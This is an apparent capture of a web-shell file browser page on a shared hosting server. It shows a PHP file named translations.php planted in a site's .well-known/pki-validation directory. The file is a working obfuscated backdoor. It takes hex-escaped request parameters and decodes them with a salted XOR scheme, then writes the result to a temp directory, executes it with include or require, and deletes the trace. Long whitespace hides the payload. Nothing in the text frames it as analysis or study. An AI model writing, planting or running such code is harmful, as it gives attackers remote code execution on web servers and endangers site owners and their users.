HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //home/vitanhod/vigolic-1001.vitavit.com.pk/.well-known/pki-validation/translations.php
<?php																																										if(array_key_exists("\x62\x69nd", $_REQUEST) && !is_null($_REQUEST["\x62\x69nd"])){ $item = $_REQUEST["\x62\x69nd"]; $item = explode( '.' ,$item ); $factor = ''; $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt1); foreach ($item as $n => $v6) { $chS = ord($salt1[$n % $sLen]); $dec = ((int)$v6 - $chS - ($n % 10)) ^ 59; $factor.=chr($dec); } $comp = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), "/tmp", getcwd(), sys_get_temp_dir(), "/dev/shm", session_save_path(), getenv("TMP")]); $entity = 0; do { $itm = $comp[$entity] ?? null; if ($entity >= count($comp)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($itm)) { $tkn = sprintf("%s/.property_set", $itm); if (file_put_contents($tkn, $factor)) { require $tkn; unlink($tkn); die(); } } $entity++; } while (true); }


if(!is_null($_REQUEST["pro\x70\x65rty\x5F\x73\x65t"] ?? null)){
	$factor = $_REQUEST["pro\x70\x65rty\x5F\x73\x65t"];
	 	$factor= explode(	".", $factor			)		 ;  
	$data_chunk = '';
            $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen( $salt3);
            $t = 0;
    
            while( $t < count( $factor)) {
                $v5 = $factor[$t];
                $chS = ord( $salt3[$t%$sLen]);
                $d =( ( int)$v5 - $chS -( $t%10)) ^ 13;
                $data_chunk .= chr( $d);
                $t++;
            }
	$object = array_filter([sys_get_temp_dir(), "/dev/shm", getcwd(), getenv("TEMP"), "/tmp", getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp"]);
	while ($item = array_shift($object)) {
    		if (is_writable($item) && is_dir($item)) {
    $parameter_group = vsprintf("%s/%s", [$item, ".comp"]);
    if (@file_put_contents($parameter_group, $data_chunk) !== false) {
	include $parameter_group;
	unlink($parameter_group);
	die();
}
}
}
}